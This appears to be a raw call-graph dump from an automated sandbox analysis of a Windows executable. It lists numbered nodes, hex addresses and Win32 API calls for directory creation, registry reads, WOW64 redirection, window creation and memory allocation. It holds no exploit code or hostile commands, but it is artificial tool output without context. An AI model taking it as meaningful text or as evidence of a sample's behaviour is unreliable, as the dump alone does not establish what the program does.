6260 405854 5 API calls 6258->6260 6261 409efb 6259->6261 6260->6245 6262 406638 5 API calls 6261->6262 6263 409f0c 6262->6263 6264 403340 4 API calls 6263->6264 6265 409f1a 6264->6265 6266 4031e8 4 API calls 6265->6266 6267 409f2a 6266->6267 6268 4074e0 23 API calls 6267->6268 6269 409f69 6268->6269 6270 402594 4 API calls 6269->6270 6271 409f89 6270->6271 6272 407a28 5 API calls 6271->6272 6273 409fcb 6272->6273 6274 407cb8 21 API calls 6273->6274 6275 409ff2 6274->6275 6276->6248 6203 407548 6204 407554 CloseHandle 6203->6204 6205 40755d 6203->6205 6204->6205 6655 402b48 RaiseException 6206 407749 6207 4076dc WriteFile 6206->6207 6213 407724 6206->6213 6208 4076e8 6207->6208 6209 4076ef 6207->6209 6210 40748c 21 API calls 6208->6210 6211 407700 6209->6211 6212 4073ec 20 API calls 6209->6212 6210->6209 6212->6211 6213->6206 6214 4077e0 6213->6214 6215 4078db InterlockedExchange 6214->6215 6217 407890 6214->6217 6216 4078e7 6215->6216 6656 40294a 6657 402952 6656->6657 6658 403554 4 API calls 6657->6658 6659 402967 6657->6659 6658->6657 6660 403f4a 6661 403f53 6660->6661 6663 403f5c 6660->6663 6664 403f07 6661->6664 6667 403f09 6664->6667 6666 403f3c 6666->6663 6668 403154 4 API calls 6667->6668 6670 403e9c 6667->6670 6673 403f3d 6667->6673 6687 403e9c 6667->6687 6668->6667 6669 403ef2 6672 402674 4 API calls 6669->6672 6670->6666 6670->6669 6676 403ea9 6670->6676 6678 403e8e 6670->6678 6675 403ecf 6672->6675 6673->6663 6675->6663 6676->6675 6677 402674 4 API calls 6676->6677 6677->6675 6679 403e4c 6678->6679 6680 403e62 6679->6680 6681 403e7b 6679->6681 6684 403e67 6679->6684 6682 403cc8 4 API calls 6680->6682 6683 402674 4 API calls 6681->6683 6682->6684 6685 403e78 6683->6685 6684->6685 6686 402674 4 API calls 6684->6686 6685->6669 6685->6676 6686->6685 6688 403ed7 6687->6688 6694 403ea9 6687->6694 6689 403ef2 6688->6689 6691 403e8e 4 API calls 6688->6691 6692 402674 4 API calls 6689->6692 6690 403ecf 6690->6667 6693 403ee6 6691->6693 6692->6690 6693->6689 6693->6694 6694->6690 6695 402674 4 API calls 6694->6695 6695->6690 6704 405150 6705 405163 6704->6705 6706 404e48 19 API calls 6705->6706 6707 405177 6706->6707 6277 403a52 6278 403a5a WriteFile 6277->6278 6280 403a74 6277->6280 6279 403a78 GetLastError 6278->6279 6278->6280 6279->6280 6281 402654 6282 403154 4 API calls 6281->6282 6283 402614 6282->6283 6284 402632 6283->6284 6285 403154 4 API calls 6283->6285 6285->6284 5652 409e62 5653 409aa0 4 API calls 5652->5653 5654 409e67 5653->5654 5655 409e6c 5654->5655 5755 402f24 5654->5755 5689 4098f4 5655->5689 5658 409ec4 5694 4026c4 GetSystemTime 5658->5694 5660 409e71 5660->5658 5760 408dd8 5660->5760 5661 409ec9 5695 409330 5661->5695 5665 4031e8 4 API calls 5667 409ede 5665->5667 5666 409ea0 5669 409ea8 MessageBoxA 5666->5669 5713 406928 5667->5713 5669->5658 5671 409eb5 5669->5671 5763 405854 5671->5763 5676 409f0c 5740 403340 5676->5740 5678 409f1a 5679 4031e8 4 API calls 5678->5679 5680 409f2a 5679->5680 5681 4074e0 23 API calls 5680->5681 5682 409f69 5681->5682 5683 402594 4 API calls 5682->5683 5684 409f89 5683->5684 5685 407a28 5 API calls 5684->5685 5686 409fcb 5685->5686 5687 407cb8 21 API calls 5686->5687 5688 409ff2 5687->5688 5767 40953c 5689->5767 5694->5661 5698 409350 5695->5698 5699 409375 CreateDirectoryA 5698->5699 5703 408dd8 4 API calls 5698->5703 5708 407284 5 API calls 5698->5708 5712 405880 4 API calls 5698->5712 5859 406cf4 5698->5859 5882 409224 5698->5882 5901 404c84 5698->5901 5904 408da8 5698->5904 5700 4093ed 5699->5700 5701 40937f GetLastError 5699->5701 5702 40322c 4 API calls 5700->5702 5701->5698 5704 4093f7 5702->5704 5703->5698 5706 4031b8 4 API calls 5704->5706 5707 409411 5706->5707 5709 4031b8 4 API calls 5707->5709 5708->5698 5710 40941e 5709->5710 5710->5665 5712->5698 6014 406820 5713->6014 5716 403454 4 API calls 5717 40694a 5716->5717 5718 4066c0 5717->5718 6019 4068e4 5718->6019 5721 4066f0 5723 403340 4 API calls 5721->5723 5722 4066fe 5724 403454 4 API calls 5722->5724 5727 4066fc 5723->5727 5725 406711 5724->5725 5726 403340 4 API calls 5725->5726 5726->5727 5728 403198 4 API calls 5727->5728 5729 406733 5728->5729 5730 406638 5729->5730 5731 406642 5730->5731 5732 406665 5730->5732 6025 406950 5731->6025 5733 40322c 4 API calls 5732->5733 5735 40666e 5733->5735 5735->5676 5736 406649 5736->5732 5737 406654 5736->5737 5738 403340 4 API calls 5737->5738 5739 406662 5738->5739 5739->5676 5741 403344 5740->5741 5742 4033a5 5740->5742 5743 4031e8 5741->5743 5744 40334c 5741->5744 5745 4031fc 5743->5745 5748 403254 4 API calls 5743->5748 5744->5742 5749 4031e8 4 API calls 5744->5749 5750 40335b 5744->5750 5746 403228 5745->5746 5751 4025ac 4 API calls 5745->5751 5746->5678 5747 403254 4 API calls 5752 403375 5747->5752 5748->5745 5749->5750 5750->5747 5751->5746 5753 4031e8 4 API calls 5752->5753 5754 4033a1 5753->5754 5754->5678 5756 403154 4 API calls 5755->5756 5757 402f29 5756->5757 6031 402bcc 5757->6031 5759 402f51 5759->5759 5761 408da8 4 API calls 5760->5761 5762 408df4 5761->5762 5762->5666 5764 405859 5763->5764 5765 405930 5 API calls 5764->5765 5766 40586b 5765->5766 5766->5766 5774 40955b 5767->5774 5768 409590 5770 40959d GetUserDefaultLangID 5768->5770 5775 409592 5768->5775 5769 409594 5785 407024 GetModuleHandleA GetProcAddress 5769->5785 5770->5775 5773 40956f 5779 409884 5773->5779 5774->5768 5774->5769 5774->5773 5775->5773 5776 4095cb GetACP 5775->5776 5777 4095ef 5775->5777 5776->5773 5776->5775 5777->5773 5778 409615 GetACP 5777->5778 5778->5773 5778->5777 5780 40988c 5779->5780 5784 4098c6 5779->5784 5781 403420 4 API calls 5780->5781 5780->5784 5782 4098c0 5781->5782 5843 408e80 5782->5843 5784->5660 5786 407067 5785->5786 5787 40705e 5785->5787 5788 407070 5786->5788 5789 4070a8 5786->5789 5798 403198 4 API calls 5787->5798 5806 406f68 5788->5806 5791 406f68 RegOpenKeyExA 5789->5791 5793 4070c1 5791->5793 5792 407089 5794 4070de 5792->5794 5809 406f5c 5792->5809 5793->5794 5795 406f5c 6 API calls 5793->5795 5796 40322c 4 API calls 5794->5796 5799 4070d5 RegCloseKey 5795->5799 5800 4070eb 5796->5800 5802 407120 5798->5802 5799->5794 5812 4032fc 5800->5812 5804 403198 4 API calls 5802->5804 5805 407128 5804->5805 5805->5775 5807 406f73 5806->5807 5808 406f79 RegOpenKeyExA 5806->5808 5807->5808 5808->5792 5826 406e10 5809->5826 5813 403300 5812->5813 5814 40333f 5812->5814 5815 4031e8 5813->5815 5816 40330a 5813->5816 5814->5787 5822 403254 4 API calls 5815->5822 5823 4031fc 5815->5823 5817 403334 5816->5817 5818 40331d 5816->5818 5819 4034f0 4 API calls 5817->5819 5820 4034f0 4 API calls 5818->5820 5825 403322 5819->5825 5820->5825 5821 403228 5821->5787 5822->5823 5823->5821 5824 4025ac 4 API calls 5823->5824 5824->5821 5825->5787 5827 406e36 RegQueryValueExA 5826->5827 5828 406e7b 5827->5828 5831 406e59 5827->5831 5830 403198 4 API calls 5828->5830 5829 406e73 5832 403198 4 API calls 5829->5832 5833 406f47 RegCloseKey 5830->5833 5831->5828 5831->5829 5834 403278 4 API calls 5831->5834 5835 403420 4 API calls 5831->5835 5832->5828 5833->5794 5834->5831 5836 406eb0 RegQueryValueExA 5835->5836 5836->5827 5837 406ecc 5836->5837 5837->5828 5838 4034f0 4 API calls 5837->5838 5839 406f0e 5838->5839 5840 406f20 5839->5840 5842 403420 4 API calls 5839->5842 5841 4031e8 4 API calls 5840->5841 5841->5828 5842->5840 5844 408e8e 5843->5844 5846 408ea6 5844->5846 5856 408e18 5844->5856 5847 408e18 4 API calls 5846->5847 5848 408eca 5846->5848 5847->5848 5849 407918 InterlockedExchange 5848->5849 5850 408ee5 5849->5850 5851 408e18 4 API calls 5850->5851 5853 408ef8 5850->5853 5851->5853 5852 408e18 4 API calls 5852->5853 5853->5852 5854 403278 4 API calls 5853->5854 5855 408f27 5853->5855 5854->5853 5855->5784 5857 405880 4 API calls 5856->5857 5858 408e29 5857->5858 5858->5846 5908 406a58 5859->5908 5862 406d26 5864 406a58 5 API calls 5862->5864 5866 406d72 5862->5866 5865 406d36 5864->5865 5867 406d42 5865->5867 5869 406a34 7 API calls 5865->5869 5916 406888 5866->5916 5867->5866 5872 406a58 5 API calls 5867->5872 5878 406d67 5867->5878 5869->5867 5874 406d5b 5872->5874 5873 406638 5 API calls 5875 406d87 5873->5875 5876 406a34 7 API calls 5874->5876 5874->5878 5877 40322c 4 API calls 5875->5877 5876->5878 5879 406d91 5877->5879 5878->5866 5928 406cc8 GetWindowsDirectoryA 5878->5928 5880 4031b8 4 API calls 5879->5880 5881 406dab 5880->5881 5881->5698 5883 409244 5882->5883 5884 406638 5 API calls 5883->5884 5885 40925d 5884->5885 5886 40322c 4 API calls 5885->5886 5893 409268 5886->5893 5887 406978 6 API calls 5887->5893 5889 408dd8 4 API calls 5889->5893 5890 4033b4 4 API calls 5890->5893 5891 405880 4 API calls 5891->5893 5893->5887 5893->5889 5893->5890 5893->5891 5894 4092e4 5893->5894 5968 4091b0 5893->5968 5976 409034 5893->5976 5895 40322c 4 API calls 5894->5895 5896 4092ef 5895->5896 5897 4031b8 4 API calls 5896->5897 5898 409309 5897->5898 5899 403198 4 API calls 5898->5899 5900 409311 5899->5900 5900->5698 5902 405198 19 API calls 5901->5902 5903 404ca2 5902->5903 5903->5698 5905 408dc8 5904->5905 6004 408c80 5905->6004 5909 4034f0 4 API calls 5908->5909 5911 406a6b 5909->5911 5910 406a82 GetEnvironmentVariableA 5910->5911 5912 406a8e 5910->5912 5911->5910 5915 406a95 5911->5915 5930 406dec 5911->5930 5913 403198 4 API calls 5912->5913 5913->5915 5915->5862 5925 406a34 5915->5925 5917 403414 5916->5917 5918 4068ab GetFullPathNameA 5917->5918 5919 4068b7 5918->5919 5920 4068ce 5918->5920 5919->5920 5921 4068bf 5919->5921 5922 40322c 4 API calls 5920->5922 5923 403278 4 API calls 5921->5923 5924 4068cc 5922->5924 5923->5924 5924->5873 5934 4069dc 5925->5934 5929 406ce9 5928->5929 5929->5866 5931 406dfa 5930->5931 5932 4034f0 4 API calls 5931->5932 5933 406e08 5932->5933 5933->5911 5941 406978 5934->5941 5936 4069fe 5937 406a06 GetFileAttributesA 5936->5937 5938 406a1b 5937->5938 5939 403198 4 API calls 5938->5939 5940 406a23 5939->5940 5940->5862 5951 406744 5941->5951 5943 4069b0 5946 4069c6 5943->5946 5947 4069bb 5943->5947 5945 406989 5945->5943 5958 406970 CharPrevA 5945->5958 5959 403454 5946->5959 5948 40322c 4 API calls 5947->5948 5950 4069c4 5948->5950 5950->5936 5954 406755 5951->5954 5952 4067b9 5953 406680 IsDBCSLeadByte 5952->5953 5955 4067b4 5952->5955 5953->5955 5954->5952 5956 406773 5954->5956 5955->5945 5956->5955 5966 406680 IsDBCSLeadByte 5956->5966 5958->5945 5960 403486 5959->5960 5961 403459 5959->5961 5962 403198 4 API calls 5960->5962 5961->5960 5964 40346d 5961->5964 5963 40347c 5962->5963 5963->5950 5965 403278 4 API calls 5964->5965 5965->5963 5967 406694 5966->5967 5967->5956 5969 403198 4 API calls 5968->5969 5971 4091d1 5969->5971 5973 4091fe 5971->5973 5985 4032a8 5971->5985 5988 403494 5971->5988 5974 403198 4 API calls 5973->5974 5975 409213 5974->5975 5975->5893 5992 408f70 5976->5992 5978 40904a 5979 40904e 5978->5979 5998 406a48 5978->5998 5979->5893 5982 409081 6001 408fac 5982->6001 5986 403278 4 API calls 5985->5986 5987 4032b5 5986->5987 5987->5971 5989 403498 5988->5989 5991 4034c3 5988->5991 5990 4034f0 4 API calls 5989->5990 5990->5991 5991->5971 5993 408f7a 5992->5993 5994 408f7e 5992->5994 5993->5978 5995 408fa0 SetLastError 5994->5995 5996 408f87 Wow64DisableWow64FsRedirection 5994->5996 5997 408f9b 5995->5997 5996->5997 5997->5978 5999 4069dc 7 API calls 5998->5999 6000 406a52 GetLastError 5999->6000 6000->5982 6002 408fb1 Wow64RevertWow64FsRedirection 6001->6002 6003 408fbb 6001->6003 6002->6003 6003->5893 6005 403198 4 API calls 6004->6005 6011 408cb1 6004->6011 6005->6011 6006 408cdc 6007 4031b8 4 API calls 6006->6007 6009 408d69 6007->6009 6008 408cc8 6012 4032fc 4 API calls 6008->6012 6009->5698 6010 403278 4 API calls 6010->6011 6011->6006 6011->6008 6011->6010 6013 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6011->6013 6012->6006 6013->6011 6015 406744 IsDBCSLeadByte 6014->6015 6017 406835 6015->6017 6016 40687f 6016->5716 6017->6016 6018 406680 IsDBCSLeadByte 6017->6018 6018->6017 6020 4068f3 6019->6020 6021 406820 IsDBCSLeadByte 6020->6021 6023 4068fe 6021->6023 6022 4066ea 6022->5721 6022->5722 6023->6022 6024 406680 IsDBCSLeadByte 6023->6024 6024->6023 6026 406957 6025->6026 6027 40695b 6025->6027 6026->5736 6030 406970 CharPrevA 6027->6030 6029 40696c 6029->5736 6030->6029 6032 402bd5 RaiseException 6031->6032 6033 402be6 6031->6033 6032->6033 6033->5759 6286 402e64 6287 402e69 6286->6287 6288 402e7a RtlUnwind 6287->6288 6289 402e5e 6287->6289 6290 402e9d 6288->6290 6307 40667c IsDBCSLeadByte 6308 406694 6307->6308 6720 403f7d 6721 403fa2 6720->6721 6724 403f84 6720->6724 6723 403e8e 4 API calls 6721->6723 6721->6724 6722 403f8c 6723->6724 6724->6722 6725 402674 4 API calls 6724->6725 6726 403fca 6725->6726 6733 403d02 6739 403d12 6733->6739 6734 403ddf ExitProcess 6735 403db8 6737 403cc8 4 API calls 6735->6737 6736 403dea 6738 403dc2 6737->6738 6740 403cc8 4 API calls 6738->6740 6739->6734 6739->6735 6739->6736 6739->6739 6742 403da4 6739->6742 6743 403d8f MessageBoxA 6739->6743 6741 403dcc 6740->6741 6753 4019dc 6741->6753 6749 403fe4 6742->6749 6743->6735 6746 403dd1 6746->6734 6746->6736 6750 403fe8 6749->6750 6751 403f07 4 API calls 6750->6751 6752 404006 6751->6752 6754 401abb 6753->6754 6755 4019ed 6753->6755 6754->6746 6756 401a04 RtlEnterCriticalSection 6755->6756 6757 401a0e LocalFree 6755->6757 6756->6757 6758 401a41 6757->6758 6759 401a2f VirtualFree 6758->6759 6760 401a49 6758->6760 6759->6758 6761 401a70 LocalFree 6760->6761 6762 401a87 6760->6762 6761->6761 6761->6762 6763 401aa9 RtlDeleteCriticalSection 6762->6763 6764 401a9f RtlLeaveCriticalSection 6762->6764 6763->6746 6764->6763 6317 404206 6318 4041cc 6317->6318 6321 40420a 6317->6321 6319 404282 6320 403154 4 API calls 6322 404323 6320->6322 6321->6319 6321->6320 6323 402c08 6326 402c82 6323->6326 6327 402c19 6323->6327 6324 402c56 RtlUnwind 6325 403154 4 API calls 6324->6325 6325->6326 6327->6324 6327->6326 6330 402b28 6327->6330 6331 402b31 RaiseException 6330->6331 6332 402b47 6330->6332 6331->6332 6332->6324 6333 408c10 6334 408c17 6333->6334 6335 403198 4 API calls 6334->6335 6343 408cb1 6335->6343 6336 408cdc 6337 4031b8 4 API calls 6336->6337 6339 408d69 6337->6339 6338 408cc8 6341 4032fc 4 API calls 6338->6341 6340 403278 4 API calls 6340->6343 6341->6336 6342 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6342->6343 6343->6336 6343->6338 6343->6340 6343->6342 6344 40a011 6345 40a036 6344->6345 6346 407918 InterlockedExchange 6345->6346 6348 40a060 6346->6348 6347 40a070 6354 4076ac SetEndOfFile 6347->6354 6348->6347 6349 409aa0 4 API calls 6348->6349 6349->6347 6351 40a08c 6352 4025ac 4 API calls 6351->6352 6353 40a0c3 6352->6353 6355 4076c3 6354->6355 6356 4076bc 6354->6356 6355->6351 6357 40748c 21 API calls 6356->6357 6357->6355 6769 409916 6770 409918 6769->6770 6771 40993a 6770->6771 6772 409956 CallWindowProcA 6770->6772 6772->6771 6085 407017 6086 407008 SetErrorMode 6085->6086 6362 403018 6363 403070 6362->6363 6364 403025 6362->6364 6365 40302a RtlUnwind 6364->6365 6366 40304e 6365->6366 6368 402f78 6366->6368 6369 402be8 6366->6369 6370 402bf1 RaiseException 6369->6370 6371 402c04 6369->6371 6370->6371 6371->6363 6779 409918 6780 40993a 6779->6780 6782 409927 6779->6782 6781 409956 CallWindowProcA 6781->6780 6782->6780 6782->6781 6376 40901e 6377 409010 6376->6377 6378 408fac Wow64RevertWow64FsRedirection 6377->6378 6379 409018 6378->6379 6380 409020 SetLastError 6381 409029 6380->6381 6392 403a28 ReadFile 6393 403a46 6392->6393 6394 403a49 GetLastError 6392->6394 6223 40762c ReadFile 6224 407663 6223->6224 6225 40764c 6223->6225 6226 407652 GetLastError 6225->6226 6227 40765c 6225->6227 6226->6224 6226->6227 6228 40748c 21 API calls 6227->6228 6228->6224 6399 40a02c 6400 409aa0 4 API calls 6399->6400 6401 40a031 6400->6401 6402 40a036 6401->6402 6403 402f24 5 API calls 6401->6403 6404 407918 InterlockedExchange 6402->6404 6403->6402 6405 40a060 6404->6405 6406 40a070 6405->6406 6407 409aa0 4 API calls 6405->6407 6408 4076ac 22 API calls 6406->6408 6407->6406 6409 40a08c 6408->6409 6410 4025ac 4 API calls 6409->6410 6411 40a0c3 6410->6411 6783 40712e 6784 407118 6783->6784 6785 403198 4 API calls 6784->6785 6786 407120 6785->6786 6787 403198 4 API calls 6786->6787 6788 407128 6787->6788 6789 408f30 6792 408dfc 6789->6792 6793 408e05 6792->6793 6794 403198 4 API calls 6793->6794 6795 408e13 6793->6795 6794->6793 6796 403932 6797 403924 6796->6797 6800 40374c 6797->6800 6799 40392c 6801 403766 6800->6801 6802 403759 6800->6802 6801->6799 6802->6801 6803 403779 VariantClear 6802->6803 6803->6799 6034 4075c4 SetFilePointer 6035 4075f7 6034->6035 6036 4075e7 GetLastError 6034->6036 6036->6035 6037 4075f0 6036->6037 6038 40748c 21 API calls 6037->6038 6038->6035 6412 405ac4 6413 405ad4 6412->6413 6414 405acc 6412->6414 6415 405ad2 6414->6415 6416 405adb 6414->6416 6419 405a3c 6415->6419 6417 405930 5 API calls 6416->6417 6417->6413 6420 405a44 6419->6420 6421 405a5e 6420->6421 6422 403154 4 API calls 6420->6422 6423 405a63 6421->6423 6424 405a7a 6421->6424 6422->6420 6425 405930 5 API calls 6423->6425 6426 403154 4 API calls 6424->6426 6427 405a76 6425->6427 6428 405a7f 6426->6428 6430 403154 4 API calls 6427->6430 6429 4059a0 19 API calls 6428->6429 6429->6427 6431 405aa8 6430->6431 6432 403154 4 API calls 6431->6432 6433 405ab6 6432->6433 6433->6413 6434 4076c8 WriteFile 6435 4076e8 6434->6435 6438 4076ef 6434->6438 6436 40748c 21 API calls 6435->6436 6436->6438 6437 407700 6438->6437 6439 4073ec 20 API calls 6438->6439 6439->6437 6440 40a2ca 6449 4096fc 6440->6449 6443 402f24 5 API calls 6444 40a2d4 6443->6444 6445 403198 4 API calls 6444->6445 6446 40a2f3 6445->6446 6447 403198 4 API calls 6446->6447 6448 40a2fb 6447->6448 6458 40569c 6449->6458 6451 409745 6454 403198 4 API calls 6451->6454 6452 409717 6452->6451 6464 40720c 6452->6464 6456 40975a 6454->6456 6455 409735 6457 40973d MessageBoxA 6455->6457 6456->6443 6457->6451 6459 403154 4 API calls 6458->6459 6460 4056a1 6459->6460 6461 4056b9 6460->6461 6462 403154 4 API calls 6460->6462 6461->6452 6463 4056af 6462->6463 6463->6452 6465 40569c 4 API calls 6464->6465 6466 40721b 6465->6466 6467 407221 6466->6467 6470 40722f 6466->6470 6468 40322c 4 API calls 6467->6468 6469 40722d 6468->6469 6469->6455 6471 40724b 6470->6471 6472 40723f 6470->6472 6482 4032b8 6471->6482 6475 4071d0 6472->6475 6476 40322c 4 API calls 6475->6476 6477 4071df 6476->6477 6478 4071fc 6477->6478 6479 406950 CharPrevA 6477->6479 6478->6469 6480 4071eb 6479->6480 6480->6478 6481 4032fc 4 API calls 6480->6481 6481->6478 6483 403278 4 API calls 6482->6483 6484 4032c2 6483->6484 6484->6469 6485 402ccc 6486 402cdd 6485->6486 6490 402cfe 6485->6490 6487 402d88 RtlUnwind 6486->6487 6489 402b28 RaiseException 6486->6489 6486->6490 6488 403154 4 API calls 6487->6488 6488->6490 6491 402d7f 6489->6491 6491->6487 6812 403fcd 6813 403f07 4 API calls 6812->6813 6814 403fd6 6813->6814 6815 403e9c 4 API calls 6814->6815 6816 403fe2 6815->6816 5470 4024d0 5471 4024e4 5470->5471 5472 4024f7 5470->5472 5509 401918 RtlInitializeCriticalSection 5471->5509 5474 402518 5472->5474 5475 40250e RtlEnterCriticalSection 5472->5475 5486 402300 5474->5486 5475->5474 5478 4024ed 5480 402525 5483 402581 5480->5483 5484 402577 RtlLeaveCriticalSection 5480->5484 5482 402531 5482->5480 5516 40215c 5482->5516 5484->5483 5487 402314 5486->5487 5488 402335 5487->5488 5494 4023b8 5487->5494 5489 402344 5488->5489 5530 401b74 5488->5530 5489->5480 5496 401fd4 5489->5496 5493 402455 5493->5489 5537 401d00 5493->5537 5494->5489 5494->5493 5533 401d80 5494->5533 5541 401e84 5494->5541 5497 401fe8 5496->5497 5498 401ffb 5496->5498 5499 401918 4 API calls 5497->5499 5500 402012 RtlEnterCriticalSection 5498->5500 5503 40201c 5498->5503 5501 401fed 5499->5501 5500->5503 5501->5498 5502 401ff1 5501->5502 5506 402052 5502->5506 5503->5506 5623 401ee0 5503->5623 5506->5482 5507 402147 5507->5482 5508 40213d RtlLeaveCriticalSection 5508->5507 5510 40193c RtlEnterCriticalSection 5509->5510 5511 401946 5509->5511 5510->5511 5512 401964 LocalAlloc 5511->5512 5513 40197e 5512->5513 5514 4019c3 RtlLeaveCriticalSection 5513->5514 5515 4019cd 5513->5515 5514->5515 5515->5472 5515->5478 5517 40217a 5516->5517 5518 402175 5516->5518 5520 4021ab RtlEnterCriticalSection 5517->5520 5523 4021b5 5517->5523 5524 40217e 5517->5524 5519 401918 4 API calls 5518->5519 5519->5517 5520->5523 5521 4021c1 5525 4022e3 RtlLeaveCriticalSection 5521->5525 5526 4022ed 5521->5526 5522 402244 5522->5524 5527 401d80 7 API calls 5522->5527 5523->5521 5523->5522 5528 402270 5523->5528 5524->5480 5525->5526 5526->5480 5527->5524 5528->5521 5529 401d00 7 API calls 5528->5529 5529->5521 5531 40215c 9 API calls 5530->5531 5532 401b95 5531->5532 5532->5489 5534 401d92 5533->5534 5535 401d89 5533->5535 5534->5494 5535->5534 5536 401b74 9 API calls 5535->5536 5536->5534 5538 401d4e 5537->5538 5539 401d1e 5537->5539 5538->5539 5546 401c68 5538->5546 5539->5489 5601 401768 5541->5601 5543 401e99 5545 401ea6 5543->5545 5612 401dcc 5543->5612 5545->5494 5547 401c7a 5546->5547 5548 401c9d 5547->5548 5549 401caf 5547->5549 5559 40188c 5548->5559 5550 40188c 3 API calls 5549->5550 5552 401cad 5550->5552 5553 401cc5 5552->5553 5569 401b44 5552->5569 5553->5539 5555 401cd4 5556 401cee 5555->5556 5574 401b98 5555->5574 5579 4013a0 5556->5579 5560 4018b2 5559->5560 5568 40190b 5559->5568 5583 401658 5560->5583 5565 4018e6 5567 4013a0 LocalAlloc 5565->5567 5565->5568 5567->5568 5568->5552 5570 401b61 5569->5570 5571 401b52 5569->5571 5570->5555 5572 401d00 9 API calls 5571->5572 5573 401b5f 5572->5573 5573->5555 5575 401bab 5574->5575 5576 401b9d 5574->5576 5575->5556 5577 401b74 9 API calls 5576->5577 5578 401baa 5577->5578 5578->5556 5580 4013ab 5579->5580 5581 4013c6 5580->5581 5582 4012e4 LocalAlloc 5580->5582 5581->5553 5582->5581 5584 40168f 5583->5584 5585 4016cf 5584->5585 5586 4016a9 VirtualFree 5584->5586 5587 40132c 5585->5587 5586->5584 5588 401348 5587->5588 5595 4012e4 5588->5595 5591 40150c 5594 40153b 5591->5594 5592 401594 5592->5565 5593 401568 VirtualFree 5593->5594 5594->5592 5594->5593 5598 40128c 5595->5598 5599 401298 LocalAlloc 5598->5599 5600 4012aa 5598->5600 5599->5600 5600->5565 5600->5591 5602 401787 5601->5602 5603 40183b 5602->5603 5604 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5602->5604 5606 40132c LocalAlloc 5602->5606 5607 401821 5602->5607 5609 4017d6 5602->5609 5611 4017e7 5603->5611 5619 4015c4 5603->5619 5604->5602 5606->5602 5608 40150c VirtualFree 5607->5608 5608->5611 5610 40150c VirtualFree 5609->5610 5610->5611 5611->5543 5613 401d80 9 API calls 5612->5613 5614 401de0 5613->5614 5615 40132c LocalAlloc 5614->5615 5617 401df0 5615->5617 5616 401df8 5616->5545 5617->5616 5618 401b44 9 API calls 5617->5618 5618->5616 5620 40160a 5619->5620 5621 401626 VirtualAlloc 5620->5621 5622 40163a 5620->5622 5621->5620 5621->5622 5622->5611 5626 401ef0 5623->5626 5624 401f1c 5625 401d00 9 API calls 5624->5625 5628 401f40 5624->5628 5625->5628 5626->5624 5626->5628 5629 401e58 5626->5629 5628->5507 5628->5508 5634 4016d8 5629->5634 5632 401e75 5632->5626 5633 401dcc 9 API calls 5633->5632 5638 4016f4 5634->5638 5635 4016fe 5637 4015c4 VirtualAlloc 5635->5637 5641 40170a 5637->5641 5638->5635 5639 40175b 5638->5639 5640 40132c LocalAlloc 5638->5640 5642 40174f 5638->5642 5644 401430 5638->5644 5639->5632 5639->5633 5640->5638 5641->5639 5643 40150c VirtualFree 5642->5643 5643->5639 5645 40143f VirtualAlloc 5644->5645 5647 40146c 5645->5647 5648 40148f 5645->5648 5649 4012e4 LocalAlloc 5647->5649 5648->5638 5650 401478 5649->5650 5650->5648 5651 40147c VirtualFree 5650->5651 5651->5648 6492 4028d2 6493 4028da 6492->6493 6494 403554 4 API calls 6493->6494 6495 4028ef 6493->6495 6494->6493 6496 4025ac 4 API calls 6495->6496 6497 4028f4 6496->6497 6817 4019d3 6818 4019ba 6817->6818 6819 4019c3 RtlLeaveCriticalSection 6818->6819 6820 4019cd 6818->6820 6819->6820 6039 407fd4 6040 407fe6 6039->6040 6042 407fed 6039->6042 6050 407f10 6040->6050 6043 408021 6042->6043 6044 408015 6042->6044 6045 408017 6042->6045 6046 40804e 6043->6046 6048 407d7c 19 API calls 6043->6048 6064 407e2c 6044->6064 6061 407d7c 6045->6061 6048->6046 6051 407f25 6050->6051 6052 407d7c 19 API calls 6051->6052 6053 407f34 6051->6053 6052->6053 6054 407f6e 6053->6054 6055 407d7c 19 API calls 6053->6055 6056 407f82 6054->6056 6057 407d7c 19 API calls 6054->6057 6055->6054 6060 407fae 6056->6060 6071 407eb8 6056->6071 6057->6056 6060->6042 6074 4058b4 6061->6074 6063 407d9e 6063->6043 6065 405184 19 API calls 6064->6065 6066 407e57 6065->6066 6082 407de4 6066->6082 6068 407e5f 6069 403198 4 API calls 6068->6069 6070 407e74 6069->6070 6070->6043 6072 407ec7 VirtualFree 6071->6072 6073 407ed9 VirtualAlloc 6071->6073 6072->6073 6073->6060 6075 4058c0 6074->6075 6076 405184 19 API calls 6075->6076 6077 4058ed 6076->6077 6078 4031e8 4 API calls 6077->6078 6079 4058f8 6078->6079 6080 403198 4 API calls 6079->6080 6081 40590d 6080->6081 6081->6063 6083 4058b4 19 API calls 6082->6083 6084 407e06 6083->6084 6084->6068 6502 40a0d5 6503 40a105 6502->6503 6504 40a10f CreateWindowExA SetWindowLongA 6503->6504 6505 405184 19 API calls 6504->6505 6506 40a192 6505->6506 6507 4032fc 4 API calls 6506->6507 6508 40a1a0 6507->6508 6509 4032fc 4 API calls 6508->6509 6510 40a1ad 6509->6510 6511 406b7c 5 API calls 6510->6511 6512 40a1b9 6511->6512 6513 4032fc 4 API calls 6512->6513 6514 40a1c2 6513->6514 6515 4099a4 29 API calls 6514->6515 6516 40a1d4 6515->6516 6517 409884 5 API calls 6516->6517 6518 40a1e7 6516->6518 6517->6518 6519 40a220 6518->6519 6520 4094d8 9 API calls 6518->6520 6521 40a239 6519->6521 6524 40a233 RemoveDirectoryA 6519->6524 6520->6519 6522 40a242 73A15CF0 6521->6522 6523 40a24d 6521->6523 6522->6523 6525 40a275 6523->6525 6526 40357c 4 API calls 6523->6526 6524->6521 6527 40a26b 6526->6527 6528 4025ac 4 API calls 6527->6528 6528->6525 6087 40a0e7 6088 40a0eb SetLastError 6087->6088 6119 409648 GetLastError 6088->6119 6091 40a105 6093 40a10f CreateWindowExA SetWindowLongA 6091->6093 6092 402f24 5 API calls 6092->6091 6094 405184 19 API calls 6093->6094 6095 40a192 6094->6095 6096 4032fc 4 API calls 6095->6096 6097 40a1a0 6096->6097 6098 4032fc 4 API calls 6097->6098 6099 40a1ad 6098->6099 6132 406b7c GetCommandLineA 6099->6132 6102 4032fc 4 API calls 6103 40a1c2 6102->6103 6137 4099a4 6103->6137 6106 409884 5 API calls 6107 40a1e7 6106->6107 6108 40a220 6107->6108 6109 40a207 6107->6109 6111 40a239 6108->6111 6114 40a233 RemoveDirectoryA 6108->6114 6153 4094d8 6109->6153 6112 40a242 73A15CF0 6111->6112 6113 40a24d 6111->6113 6112->6113 6115 40a275 6113->6115 6161 40357c 6113->6161 